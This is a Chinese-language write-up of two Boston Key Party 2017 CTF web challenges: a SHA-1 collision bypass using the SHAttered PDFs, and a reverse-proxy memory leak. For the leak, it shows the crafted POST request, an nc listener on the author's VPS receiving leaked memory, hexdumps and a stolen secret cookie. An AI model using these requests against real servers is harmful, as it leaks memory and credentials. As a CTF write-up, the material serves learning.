这周,跟着实验室各位大佬们参加了BKP的比赛。国际CTF比赛好像更加综合一些,对选手即要求二进制基础也要求Web基础。下面是两道Web题的解答。
Prudentialv2这题是修复了2015年出的Prudential的漏洞。
http://blog.rentjong.net/2015/03/boston-key-party-2015-prudential.html源码可以在index.txt中看到http://54.202.82.13/index.txt
<html> <head> <title>level1</title> <link rel='stylesheet' href='style.css' type='text/css'> </head> <body> <?php require 'flag.php'; if (isset($_GET['name']) and isset($_GET['password'])) { $name = (string)$_GET['name']; $password = (string)$_GET['password']; if ($name == $password) { print 'Your password can not be your name.'; } else if (sha1($name) === sha1($password)) { die('Flag: '.$flag); } else { print '<p class="alert">Invalid password.</p>'; } } ?> <section class="login"> <div class="title"> <a href="./index.txt">Level 1</a> </div> <form method="get"> <input type="text" required name="name" placeholder="Name"/><br/> <input type="text" required name="password" placeholder="Password" /><br/> <input type="submit"/> </form> </section> </body> </html>因为string了,而且还是强等于。所以以前的方法基本不行。我们需要找到一对碰撞sha1,才能成功。
结合前天google发的sha-1碰撞论文, https://shattered.io/static/shattered.pdf 用里面给的两个示例pdf文件进行构造就好。
构造的时候会发现pdf太大了,无法在url中完全带上。然后,看论文中有这么一句:This is an identical-prefix collision attack, where a given prefix P is extended with two distinct near-collision block pairs such that they collide for any suffix S。图片的说明如下:** https://shattered.it/static/pdf_format.png**说明,碰撞部分是pdf中的某一部分,而不是全部。那么我们就可以尝试取pdf的某一部分,进行sha-1,让其碰撞。
找到碰撞部分,以urlencode编码发送请求,就能得到flag
Accelerated.zone题目给了一个反向代理,其功能大致有:
8000端口会反向代理7733的数据 反代不管访问啥都会返回500 在逆反向代理,核心用的是这个库https://github.com/rboulton/libmicrohttpd ,大概逻辑是用这个库起了一个server,读取来自用户的输入,然后起一个curl读取远程的内容,再返回 发送给反代的http头部中的host指向的部分,实际控制代理服务器的转发。即host指向哪,服务器就会向那进行转发后来,问了队友,队友说这题存在内存泄漏,把泄漏数据打到VPS上读取就好了。(可能这就是这个反向代理软件运行久了,就超级烧内存和CPU的原因)
所以,向Accerletated发送一个包,host为自己的VPS,然后查看数据。
这个包需要是POST的数据包,然后content-length需要很大。
POST / HTTP/1.1 Host: xx.xx.13.97:8000 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:50.0) Gecko/20100101 Firefox/50.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 999999999 123在VPS上可以看到数据
[root@cloud ~]# nc -l -vv 7733|hexdump -Cv Connection from 54.218.82.219 port 7733 [tcp/*] accepted 00000000 50 4f 53 54 20 2f 20 48 54 54 50 2f 31 2e 31 0d |POST / HTTP/1.1.| 00000010 0a 48 6f 73 74 3a 20 31 31 38 2e 39 39 2e 31 33 |.Host: xx.x.xx| 00000020 2e 39 37 3a 37 37 33 33 0d 0a 41 63 63 65 70 74 |.xx:xx..Accept| 00000030 3a 20 2a 2f 2a 0d 0a 43 6f 6e 74 65 6e 74 2d 4c |: */*..Content-L| 00000040 65 6e 67 74 68 3a 20 33 38 35 32 37 0d 0a 43 6f |ength: 38527..Co| 00000050 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c |ntent-Type: appl| 00000060 69 63 61 74 69 6f 6e 2f 78 2d 77 77 77 2d 66 6f |ication/x-www-fo| 00000070 72 6d 2d 75 72 6c 65 6e 63 6f 64 65 64 0d 0a 45 |rm-urlencoded..E| 00000080 78 70 65 63 74 3a 20 31 30 30 2d 63 6f 6e 74 69 |xpect: 100-conti| 00000090 6e 75 65 0d 0a 0d 0a 31 32 33 00 00 00 00 00 00 |nue....123......| 000000a0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| ... 0088f0 00 11 7e 00 00 00 00 00 00 b8 07 00 c0 b9 7f 00 |..~.............| 00008900 00 b8 07 00 c0 b9 7f 00 00 e0 92 00 c0 b9 7f 00 |................| 00008910 00 e0 92 00 c0 b9 7f 00 00 74 20 69 70 36 2d 6c |.........t ip6-l| 00008920 6f 63 61 6c 68 6f 73 74 20 69 70 36 2d 6c 6f 6f |ocalhost ip6-loo| 00008930 70 62 61 63 6b 0a 66 65 30 30 3a 3a 30 09 69 70 |pback.fe00::0.ip| 00008940 36 2d 6c 6f 63 61 6c 6e 65 74 0a 66 66 30 30 3a |6-localnet.ff00:| 00008950 3a 30 09 69 70 36 2d 6d 63 61 73 74 70 72 65 66 |:0.ip6-mcastpref| 00008960 69 78 0a 66 66 30 32 3a 3a 31 09 69 70 36 2d 61 |ix.ff02::1.ip6-a| 00008970 6c 6c 6e 6f 64 65 73 0a 66 66 30 32 3a 3a 32 09 |llnodes.ff02::2.| 00008980 69 70 36 2d 61 6c 6c 72 6f 75 74 65 72 73 0a 31 |ip6-allrouters.1| 00008990 37 32 2e 31 37 2e 30 2e 32 09 34 32 39 63 35 37 |72.17.0.2.429c57| 000089a0 64 38 38 31 32 34 0a 72 63 68 20 75 73 2d 77 65 |d88124.rch us-we| 000089b0 73 74 2d 32 2e 63 6f 6d 70 75 74 65 2e 69 6e 74 |st-2.compute.int| 000089c0 65 72 6e 61 6c 0a 00 00 00 00 00 00 00 00 00 00 |ernal...........|多打几次会打到一个cookie
00007d50 00 00 00 40 87 00 dc 53 7f 00 00 47 87 00 dc 53 |...@...S...G...S| 00007d60 7f 00 00 02 00 00 00 00 00 00 00 73 65 63 72 65 |...........secre| 00007d70 74 00 73 50 62 6b 54 68 62 32 69 4b 59 4f 38 74 |t.sPbkThb2iKYO8t| 00007d80 5a 53 50 49 31 70 71 77 00 00 00 20 87 00 dc 53 |ZSPI1pqw... ...S| 00007d90 7f 00 00 7a 0a 00 dc 53 7f 00 00 8a 0a 00 dc 53 |...z...S.......S|Cookie: secret=sPbkThb2iKYO8tZSPI1pqw
然后,带着cookie访问,就能得到flag
GET / HTTP/1.1 Host: accelerated.zone:8000 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:50.0) Gecko/20100101 Firefox/50.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Cookie: secret=sPbkThb2iKYO8tZSPI1pqw DNT: 1 Connection: close Upgrade-Insecure-Requests: 1HTTP/1.1 500 Internal Server Error Connection: close Content-Length: 63 Content-Type: text/html; charset=UTF-8 Date: Sun, 26 Feb 2017 03:47:37 GMT FLAG{ISwearIWroteThisChallengeWeeksAgo}Get better cookies bro.
